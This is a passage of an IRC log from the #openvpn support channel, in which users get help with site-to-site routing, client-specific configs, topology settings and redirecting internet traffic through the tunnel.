MeanderingCode_ [~Meanderin@71-213-190-2.albq.qwest.net] has joined #openvpn 00:04 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 252 seconds] 00:07 -!- [fred] [fred@konfuzi.us] has joined #openvpn 00:29 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 01:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:22 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 02:35 -!- emmanuel__ [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 02:54 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 03:26 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 03:28 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 03:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 03:36 -!- Orbi [~opera@anon-186-55.vpn.ipredator.se] has joined #openvpn 03:54 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 04:12 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 04:12 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 04:14 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 04:15 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 04:16 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 04:23 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:30 -!- Orbi [~opera@anon-186-55.vpn.ipredator.se] has left #openvpn [] 04:33 -!- brute11k [~brute@89.249.230.134] has quit [Ping timeout: 252 seconds] 04:34 -!- Orbi [~opera@anon-186-55.vpn.ipredator.se] has joined #openvpn 04:41 -!- brute11k [~brute@89.249.230.134] has joined #openvpn 04:45 < jzaw> ping pekster 04:46 < jzaw> just pondering this split routing non def1 vpn 04:47 < jzaw> and the public ips i have on the client lan 04:50 < jzaw> if you remember pinging fuji-pl.dzki.co.uk (ipv4) the echo request comes down the vpn to the client router then onto the client lan and hits the lappy but reply goes out the default route ie the nat 04:51 < jzaw> i can fix that on an individual bases on linux hosts by adding a ip table rule to detect where the request has come from 04:52 < jzaw> but that wont work for things like a pap2 voip ata 05:09 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 05:10 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 05:15 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 05:24 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 258 seconds] 05:25 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 05:26 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Client Quit] 05:32 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn 05:44 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 05:46 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 05:48 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 05:49 -!- fluter [~fluter@fedora/fluter] has quit [Ping timeout: 258 seconds] 05:59 -!- gladiatr [~usualfrog@openvpn/community/support/gladiatr] has joined #openvpn 06:04 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Read error: Connection reset by peer] 06:05 -!- JSharpe [~JSharpe@46.165.210.17] has joined #openvpn 06:05 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Ping timeout: 258 seconds] 06:05 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 258 seconds] 06:06 -!- emmanuel__ [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 258 seconds] 06:07 -!- tekzilla [~jon@24.134.142.157] has quit [Ping timeout: 258 seconds] 06:07 -!- tekzilla [~jon@24.134.142.157] has joined #openvpn 06:07 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 06:07 -!- emmanuel__ [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 06:10 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 06:56 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 07:07 < jzaw> pekster, i may have got it ! 07:36 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 264 seconds] 07:54 -!- fluter [~fluter@fedora/fluter] has quit [Ping timeout: 258 seconds] 08:02 -!- penk [~dave@216.142.113.233] has joined #openvpn 08:45 -!- teknoprep [~quassel@c-50-152-69-94.hsd1.pa.comcast.net] has joined #openvpn 08:46 -!- teknoprep [~quassel@c-50-152-69-94.hsd1.pa.comcast.net] has quit [Changing host] 08:46 -!- teknoprep [~quassel@unaffiliated/teknoprep] has joined #openvpn 08:47 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:47 < teknoprep> how would i setup a single OVPN Server... then have 2 clients (these are site to site vpn's)... use the same OVPN server? do i have to create a different OVPN server for each remote site.. using a different port... and a different Transfport Network ? 08:48 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 08:53 -!- Volkswagner [~eric@cpe-24-161-55-139.hvc.res.rr.com] has joined #openvpn 08:55 < Volkswagner> Greetings, with the help from Poster, I have setup server on my router and connect via client, routed tun connection. 08:55 < Volkswagner> configs here http://pastebin.com/vv93Y4Hx 08:56 < Volkswagner> It appears the when the client connects is shows the Tun0 ip address, I expected to see the remote lan address, is this normal? 08:58 < Volkswagner> here is result from ifconfig on the mac while tunnel is active http://pastebin.com/YVaG6FGA 08:59 < Volkswagner> With tunnel connected, I can ssh into client located on servers LAN, but the ssh machine sees my ip as 10.0.0.6 08:59 < jzaw> teknoprep not done it myself and in the absence of higher more knowledgeable answers 09:00 < rob0> Volkswagner, what's wrong with that? 09:00 < jzaw> you just run a single instance and make sure your tun subnet has enough ips .. + maybe run topology /30 09:00 < Volkswagner> When checking the Openvpn server the /tmp/ipp.txt shows the same machine as Eric,10.0.0.4 09:00 < jzaw> so each subsequent client gets the next ip 09:01 < teknoprep> jzaw... here is where i am stumbling... how will it know to route to a remote network 09:01 < Volkswagner> rob0, I'm not sure if it is wrong, it is not what I expected, I thought the tunnel ip's would be "invisible" 09:01 < teknoprep> each client will have a different subnet behind it 09:01 < jzaw> each remote network lan ips much be non clashing 09:01 < rob0> no. When you are using the tunnel IP address, that's what will show on the other side. 09:01 < teknoprep> this is a Site-Site / Hub & Spoke configuration 09:02 < jzaw> and you just route to that subnet down the tun 09:02 < jzaw> but each client needs ccd/clientcertcommonname file 09:02 < teknoprep> how does the openVPN server know to "just route" down the correct tunnel 09:02 < jzaw> to define its routes etc 09:03 < Volkswagner> rob0, ok the result from ifconfig just seemed a bit weird to me >>> inet 10.0.0.6 --> 10.0.0.5 netmask 0xffffffff 09:03 < Volkswagner> also the ip did not match with /tmp/ipp.txt 09:04 < Volkswagner> I'm getting high latency, and I'm wondering if it is just my test environment (cellular > wifi share > tunnel) 09:05 < teknoprep> jzaw... when a client connects to the server... in the client config can i tell the server what networks exist on the client side ? 09:05 < rob0> I guess that's 10.0.0.6 on your end, 10.0.0.5 is the peer. It sounds like you're using "--topology net30", and if so, why? It's rarely a good idea, only needed to support ancient openvpn clients. 09:05 < teknoprep> that would make everything work 09:05 < rob0> !clientlan 09:05 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a 09:05 <@vpnHelper> better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 09:06 < jzaw> teknoprep, what rob0 said ^^^^ 09:08 < Volkswagner> rob0, I don't have --topology net30 on my config, unless it is a default on OpenVPN @openwrt, it should not be the reason??? 09:10 < Volkswagner> http://ircpimps.org/clientlan.png = 404 not found 09:11 < jzaw> Volkswagner, not 404 for me 09:11 < rob0> wfm also 09:14 < Volkswagner> hmn, must be an opendns issue, works via hidemyass.com, but not on any of my router connected clients 09:14 < rob0> haha maybe opendns protecting you from "pimps" :) 09:16 < Volkswagner> is there a command I can use to check all server configs? ie: find defaults not listed on server config file? 09:18 < teknoprep> it'll probably be easier to setup 2 vpn servers on one server using different ports 09:19 < jzaw> teknoprep, you still have to set the routes up 09:19 < teknoprep> thats easy to do 09:19 < jzaw> if you know them for two instances 09:19 < jzaw> you know them for one 09:20 < teknoprep> how do i puch a static IP to the client 09:20 < teknoprep> ccd ? 09:20 < teknoprep> i am not quite understand ccd 09:21 < teknoprep> i will have a tunnel network... lets say i make is a /28 so i can encompass all the remote clients 09:22 < teknoprep> each remote client will have a /24 behind them 09:22 < teknoprep> i then use iroute and route to route to and from those networks 09:22 < teknoprep> the issue i am running into is how to staticlly assign a tunnel network IP to each client 09:22 < teknoprep> so the routes never change 09:23 < jzaw> iroute in ccd file 09:23 < jzaw> each file is named as the commonname of the cert for that client 09:24 < jzaw> then a route statement in the main conf 09:24 < jzaw> for each client 09:24 < jzaw> if ive got it rignt ... not done it myself ... so it bares correcting 09:24 < jzaw> a /24 maybe a tad excessive 09:24 < jzaw> how many clients do you have? 09:25 < teknoprep> http://openvpn.net/index.php/open-source/faq/77-server/273-qifconfig-poolq-option-use-a-30-subnet-4-private-ip-addresses-per-client-when-used-in-tun-mode.html 09:25 <@vpnHelper> Title: "ifconfig-pool" option use a /30 subnet (4 private IP addresses per client) when used in TUN mode? (at openvpn.net) 09:25 < teknoprep> 6 clients 09:25 < teknoprep> all clients are interconnected by IPsec 09:25 < teknoprep> we are adding all 6 clients to then connect over OpenVPN to an OpenVPN server in Amazon AWS 09:25 < teknoprep> i guess i have to create a /30 network for each client 09:28 < teknoprep> so i don't think i can do this with a shared key 09:28 < teknoprep> i have to use SSL/TLS 09:28 < teknoprep> each client must have a different Cert if i am understanding this correctly 09:28 < teknoprep> so OpenVPN can differentiate which client is connecting 09:29 < jzaw> you dont need a /30 per client if you use topology /30 09:30 < jzaw> and yes its prob better to use a cert per client id have thought 09:30 < teknoprep> ? 09:30 < jzaw> !/30 09:30 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 09:30 < jzaw> !topology 09:30 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 09:30 < teknoprep> no windows clients here 09:31 < rob0> Volkswagner, verb 4 IIRC prints out all the settings. 09:34 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Operation timed out] 09:39 < jzaw> teknoprep, works with linux clients too afaik 09:47 < teknoprep> hey looks like i did it 09:47 < teknoprep> w0ot 09:47 < teknoprep> what a PITA 09:47 < teknoprep> lol 09:47 < jzaw> nice 09:48 < jzaw> multi instances 09:48 < Volkswagner> rob0, thanks. I have changed the server config to option 'verb' '4', and tried start from command line, no extra output 09:48 < jzaw> or single ? 09:48 < teknoprep> single 09:48 < teknoprep> all on same port 09:48 < Volkswagner> what might I be doing wrong? 09:48 < teknoprep> 1194 09:48 < jzaw> good goo 09:48 < jzaw> d 09:48 < teknoprep> multi instance would have been easy to do 09:48 < teknoprep> why do it the easy way 09:48 < jzaw> hehe ... well i have an unusual setup myself 09:48 < jzaw> too 09:49 < teknoprep> i am not used to using SSL/TLS Peer to Peer configurations.. i usually just do a shared key 09:49 < teknoprep> i had to have a TLS Auth license 09:49 < jzaw> in my case ive got a no nat server end and a nat client end with hosts behind 09:49 < teknoprep> or cert 09:50 < teknoprep> ahh 09:50 < jzaw> to which ive given nat public ips 09:50 < teknoprep> i was thinking about building a network from my house to my office 09:50 < jzaw> and are only accessible via the vpn 09:50 < teknoprep> and pass down VLAN's 09:50 < teknoprep> can i do 802.1q over OPVN Bridge ? 09:50 < jzaw> but i dont sent all traffic down the vpn ... those client end hosts can browse normally out of the nat 09:51 < jzaw> bridge is bridge and can do anthing a bridge can do 09:51 < jzaw> layer 2 09:51 < teknoprep> nice 09:55 < teknoprep> w0ot 09:55 < teknoprep> it worked 09:55 < teknoprep> 10.0.1.1 and 10.0.2.1 are differentiated by the client certs 09:55 < teknoprep> this rocks 09:56 < teknoprep> now i know how to finish up to make routing work 09:56 < jzaw> the problem with split routing and public ips is that a ping to the client end host on an ip enters via the vpn ... but leaves via the default route ie the nat ... no ping reply 09:56 < teknoprep> since they will always get the same IP 09:56 < jzaw> thats the idea 09:56 < jzaw> predictable routes 09:56 < teknoprep> thats what i was trying to wrap my head around earlier 09:56 < teknoprep> i couldn't figure out how the clients would always get the same IP address if they were on the same openvpn instance 09:56 < teknoprep> now i get it 09:56 < teknoprep> lol 09:57 < jzaw> the tricky thing is that you have to have the iroute in the ccd file and route in the conf 09:57 < teknoprep> what is the iroute command for ? 09:57 < teknoprep> !iroute 09:57 <@vpnHelper> "iroute" is does not bypass or alter the kernel's routing table, it allows openvpn to know it should handle the routing when the kernel points to it but the network is not one that openvpn knows about. This is only needed when connecting a LAN which is behind a client, and therefor belongs in a ccd entry. Also see !route and !ccd 09:58 < teknoprep> so right now... on each client specifig config i have ... push "route 10.254.1.0 255.255.255.0"; 09:58 < teknoprep> this is the network inside my Amazon AWS 09:58 < jzaw> read up how to push different ifconfig settings 09:59 < teknoprep> i will also need to setup an "iroute 10.20.1.0 255.255.255.0"; first site 09:59 < teknoprep> this needs to be in the server.. am i understanding this correctly ? 10:06 < teknoprep> differen ifconfig settings ? 10:13 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 10:14 < teknoprep> 10.254.1.0/24 10.0.1.2 UGS 0 0 1500 ovpnc1 10:14 < teknoprep> problem is i can't ping anything on that network 10:14 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 240 seconds] 10:14 < teknoprep> from the 10.20.1.0/24 network... i can't ping anything on the 10.254.1.0/24 network... not even the openvpn server local IP 10:15 < teknoprep> i have an iroute command in the ccd... i have a route command at the server config that says push 10.254.1.0/24 to all the clients.. that seems to be working 10:15 < teknoprep> how do i check if the iroute command is actually working properly ? 10:16 < teknoprep> should my OpenVPN server be able to ping the IP address handed out to the OpenVPN client ? 10:16 < teknoprep> the network is 10.0.1.0/30... so i am assuming .0 network / .1 server / .2 client / .3 broadcast 10:17 < teknoprep> so should the OpenVPN server(10.0.1.1) be able to ping The Client (10.0.1.2) 10:28 -!- JSharpe_ [~JSharpe@46.165.210.17] has joined #openvpn 10:28 -!- JSharpe_ [~JSharpe@46.165.210.17] has quit [Read error: Connection reset by peer] 10:36 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 10:39 < teknoprep> ?? 10:46 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds] 10:48 < jzaw> teknoprep, yes 10:48 < teknoprep> i can't 10:48 < jzaw> whats your networks look like? 10:49 < jzaw> 192.x.x.x. - tun 10.0.1.1 - 10.0.1.2 - 192.y.y.y ? 10:52 < teknoprep> one sec let me bring back up the tunnels 10:52 < teknoprep> so this is how it looks 10:52 < teknoprep> (Client1)192.168.1.0/24 - tun 10.0.1.2 - 10.0.1.1 - 10.254.1.0/24(Server in AWS) 11:23 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 11:24 -!- bkrieg1337 [~bkrieg133@120.28.171.16] has joined #openvpn 11:24 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 11:24 < bkrieg1337> hello 11:24 < bkrieg1337> is it necessary to always .var, .clean-all 11:25 < bkrieg1337> when creating for additional clients 11:25 < bkrieg1337> will the previous be deleted by . clean-all? 11:25 < teknoprep> jzaw: should my client be able to ping 10.0.1.1 ? 11:26 < teknoprep> jzaw: and should the server be able to ping 10.0.1.2 ? 11:26 < teknoprep> i can ping 10.0.1.1 from my client side 11:27 < teknoprep> but the ping time is .184ms... it must be local the 10.0.1.1 address 11:28 < pekster> bkrieg1337: In Easy-RSA 2.x you need to source vars any time you're in a new terminal or environment before you perform PKI tasks. You should never run clean-all unless you want to remove all your PKI files and start completely over (new CA, etc) 11:28 < bkrieg1337> thank you 11:33 < teknoprep> 10.254.1.0/24 10.0.1.6 UGS 0 2 1500 ovpnc1 11:33 < teknoprep> that is my new route... i made a few changes 11:33 < teknoprep> i can't ping that interface tho from the 192.168.1.0/24 network 11:33 < teknoprep> ip forwarding is enabled 11:34 < teknoprep> hell i can't ping that interface ip from the local box that is running OpenVPN 11:34 < pekster> teknoprep: What's your situation? LAN behind the server? 11:34 < teknoprep> 192.x.x.x. - tun 10.0.1.1 - 10.0.1.2 - 192.y.y.y ? 11:34 < teknoprep> sorry let me update 11:35 < teknoprep> (CLIENT)192.168.1.0/24 - tun 10.0.1.6 - 10.0.1.5 tun - 10.254.1.0/24(OpenVPN Server in AWS) 11:35 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 264 seconds] 11:35 < pekster> So you have LANs at both ends you're trying to route across the VPN for? 11:35 < teknoprep> everything is UP at this point for the VPN's 11:35 < teknoprep> yes 11:35 < teknoprep> now to get routes to push properly 11:35 < pekster> Pick one at a time to get working (one LAN to connect to the opposing peer's VPN IP) 11:36 < pekster> !serverlan 11:36 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 11:36 < pekster> Then when the server-side LAN is working, see: 11:36 < pekster> !clientlan 11:36 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 11:36 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 11:36 < teknoprep> yes i already have all of that done 11:36 < teknoprep> ip-forwarding is enabled on both OpenVPN server/client 11:36 < teknoprep> no rules blocking traffic 11:37 < teknoprep> from the Client OpenVPN Client ... should i be able to ping the ip address 10.0.1.6 ? 11:37 < teknoprep> this is the IP address that is staticly assigned from the OpenVPN server 11:38 < pekster> Nope, it's a virtual peering IP in /net30. You shouldn't use that unless you *actually* need to support 2.0.9 Windows clients that are over 6 years old 11:38 < pekster> !/30 11:38 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 11:38 < teknoprep> gotcha 11:40 < jzaw> pekster, did you see .. i got that split routing working with proper returns of traffic initiated through the vpn 11:41 < jzaw> if you ping/trace fuji-pl.dzki.co.uk now on ipv4 it traces the route properly 11:41 < pekster> Policy routing does great things when properly set up 11:42 < jzaw> its all MARK and CONNMARK with rules and routes 11:43 < jzaw> kind of tidy really 11:43 < jzaw> very pleased it works 11:43 < pekster> Yup, that's the right way to do it 11:43 < jzaw> now i dont load the home internet connection unnecessarily 11:44 < teknoprep> pekster: jzaw: why would openvpn be setting my push "route 10.254.1.0 255.255.255.0" on my client box to do this... route 10.254.1.0/24 to 10.0.8.6 instead of 10.0.8.5 ? 11:45 < teknoprep> or is 10.0.8.6 used for routing on the OpenVPN client for the remote LAN 11:45 < teknoprep> pekster: with your comment on its a virtual peering IP /net30... i shouldnt' use that 11:46 < teknoprep> pekster: i am at a loss with how routing is supposed to work then 11:46 < jzaw> you should get a lower ip at the server on the tunnel 11:46 < jzaw> and higher number at the client tunnel end 11:46 < teknoprep> i am getting a virtual address of 10.0.8.5 on both ends 11:47 < jzaw> pekster, ^^^ ? 11:47 < pekster> jzaw: Nope, other way around. The bot outbound said so just a page earlier 11:47 < pekster> teknoprep: Just use --topology subnet. You've been given that information at least twice now 11:48 < pekster> net30 is a stupid hack for old Windows systems so they could have cool things that Unix could do anyway 11:48 < teknoprep> ok... so now i need to start over 11:48 < teknoprep> and not use net 30 11:48 < pekster> Just add topology subnet 11:48 < pekster> That's it. No starting over 11:48 < pekster> Better yet, 11:49 < pekster> !configs 11:49 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 11:49 -!- Volkswagner [~eric@cpe-24-161-55-139.hvc.res.rr.com] has quit [Ping timeout: 255 seconds] 11:49 < pekster> I mean, you can leave net30 if you want, but since you're apparently confused about how it works, now's as good a time as any to fix it 11:50 < teknoprep> not really confused on how it work 11:50 < teknoprep> it makes sense 11:50 < teknoprep> server gets 10.0.8.5 11:50 < pekster> No! 11:50 < teknoprep> client gets 10.0.8.6 11:50 < pekster> :( 11:50 < pekster> Nope 11:50 < teknoprep> ? 11:50 < teknoprep> then how the hell do i get different IP's on the server than the client ? 11:50 < teknoprep> so i can have routing between them 11:50 -!- gladiatr [~usualfrog@openvpn/community/support/gladiatr] has left #openvpn ["Leaving"] 11:50 < pekster> It's creates a virtual /30 11:51 < teknoprep> i was assuming that this /30 was similar to an INET /30 where then you can route larger blocks of IP's to an ip inside of that /30 11:51 < pekster> The server assigns itself the first block, at 10.0.8.0/30. The server then assigns the client 10.0.8.4/30, out of which it creates a "subnet" where it peers between .6/32 and .5/32 11:52 < pekster> The "server" is not at .5. It's still at .1. 11:52 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 11:52 < pekster> .5 is a virtual address, not used by anything except as a PtP target 11:52 < teknoprep> ahhh 11:52 < pekster> And that, is why net30 is stupid 11:52 < pekster> It's completely unnecessary, even if you need to support Windows clients. And that was the only reason to ever use it before anyway 11:52 < teknoprep> i should be able to ping 10.0.8.1 correct ? 11:52 < pekster> Right 11:52 < teknoprep> why would its ping time be less than 1ms ? 11:53 < teknoprep> when its 100 miles away 11:53 < teknoprep> seems like the local client is answering for this 11:53 < pekster> Post some configs 11:53 < teknoprep> ahh nvm 11:53 < teknoprep> its not answering 11:53 < teknoprep> i undertsand what its doing now.. so i can debug from here 11:57 < teknoprep> so the Client should get the 10.0.8.6 ip address correct ? 11:58 < teknoprep> i should be able to ping that from the client side LAN 11:58 < teknoprep> if everything is configured properly... or is that also wrong 12:00 < pekster> Firewall and routes permitting 12:01 < teknoprep> ahh nice 12:01 < teknoprep> so i think i got it then 12:04 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 12:08 < Keshl> So, I was in here a few days ago asking for help setting up VPN. It works now, I can get into my network away from home and interact with its systems as if I was home. However, I cannot access the Internet through the VPN connection. After Googling around I think I have a general idea of what needs to be done, but it's so over my head that I can't even summarize it here. Are there any guides out there that don't assume any knowledge of 12:08 < Keshl> iptables and stuff that can walk me through this? 12:09 < pekster> !redirect 12:09 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 12:09 <@vpnHelper> http://ircpimps.org/redirect.png 12:09 < Keshl> Woo OωO! 12:10 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 12:10 < Keshl> !def1 12:10 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 12:10 < Keshl> >w> Wish I could query this rather than spamming the channel. 12:11 < pekster> You can, but TBH it's more convenient to do it here as the /msg commands are longer and require the channel name 12:11 < Keshl> Ohhh oωo 12:11 < pekster> It's a slow day, and it's not spam since it's on-topic ;) 12:11 < Keshl> Still. all of /that/ was over my head, too. <.< 12:11 < Keshl> So how does I make it do magical quety stuff, oωo? 12:12 < Keshl> *query 12:12 < pekster> 'factoids whatis #openvpn thing' in a privmsg. See also 'help' and 'factoids help' 12:13 -!- civillian [~nick@174.202.49.122-static.velocitynet.com.au] has quit [Ping timeout: 256 seconds] 12:13 < Keshl> oωo. 12:13 < Keshl> ...Nope. x.x 12:14 * Keshl types "man openvpn".. Then proceeds to curl up and slowly die. 12:16 -!- bkrieg1337 [~bkrieg133@120.28.171.16] has quit [Quit: Leaving] 12:16 < Keshl> Okay, let's see what happens if I just guess randomly and see if I get lucky. Maybe it'll work. <.< 12:16 < Keshl> !ipforward 12:16 < Keshl> !nat 12:16 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 12:16 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 12:17 -!- Cubox [cubox@unaffiliated/cubox] has left #openvpn ["WeeChat 0.4.0"] 12:17 < Keshl> !linipforward 12:17 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 12:17 < pekster> Guess randomly? You have a complete flowchart and all sorts of helper output. Ask if you get stuck, but it's wise to check the bot's messages carefully and read the manpage for the directives it's telling you about first 12:18 < Keshl> pekster: I know what I meant to say but I don't think I said it right. <.< I'll be fine. Probably. The manual page is big and scary and I spaz sometimes. o_o 12:18 < pekster> The find feature helps 12:19 < Keshl> Indeedily so. Still. Tiiiiiny little scrollbar .ω. 12:19 < Keshl> And then there's the fact that, even though the router's running Linux, I have to use a GUI to change most stuff or it won't commit it to NVRAM <.< 12:20 -!- civillian [~nick@174.202.49.122-static.velocitynet.com.au] has joined #openvpn 12:20 < pekster> OpenWRT? You can edit the /config/ directory without a GUI; I build my own firmware without one 12:20 < Keshl> DD-WRT, not OpenWRT. 12:20 < Keshl> Similar name, different things. 12:20 < pekster> They're still using nvram? :( 12:20 < Keshl> Si, oωo. 12:20 < Keshl> From what I can tell developement's stalled, too. <ω< 12:20 < Keshl> Last release was in 2-11. 12:20 < Keshl> *2011 12:20 -!- penk [~dave@216.142.113.233] has quit [Quit: Leaving...] 12:22 < Keshl> ....Okay from what I can gather, ip frowarding isn't enabled, but I can't do any of that since it'll loose it whenever it looses power.. Now I have to try to figure out what the GUI calls it. <.< 12:25 < Keshl> ... Or I can read my config and see that I don't have redirect-gateway enabled. <.< Do I basically just stick "redirect-gateway def1" in it somewhere? Or am I headed in the wrong direction? 12:26 < pekster> That would be the 2nd box on the flowchart 12:27 < Keshl> Yes, oωo. But do I have the name of the command right? 12:27 < Keshl> Er, the entire line, I mean. 12:27 < Keshl> When I see "def1" I feel like I need to define it somewhere, and I know I haven't. But now I kinda feel like maybe like.. Blah mindfart x.x 12:28 < pekster> It's an optional paramater to --redirect-gateway. The manpage has full details 12:29 < Keshl> But why do people keep putting -- before them? In the config they don't have them. xwx 12:29 < pekster> !-- 12:29 <@vpnHelper> "--" is OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix is usually omitted when an option is placed in a configuration file. 12:30 < Keshl> Ohhhhh.. Kaithanks -ω- 12:30 < pekster> Also, your random characters after comments don't provide useful info and are not fun to parse 12:31 < pekster> protip: searching in the manpage for --option is more likely to quickly get you to the directive you're interested in 12:32 < Keshl> And it has. 12:32 < Keshl> Okay.. I have no idea where this would be in the GUI, so I'm gunna hope this just works. <ω< Gotta wait till later to try it from an external network though.. Thanks for the help. 12:46 -!- krzee 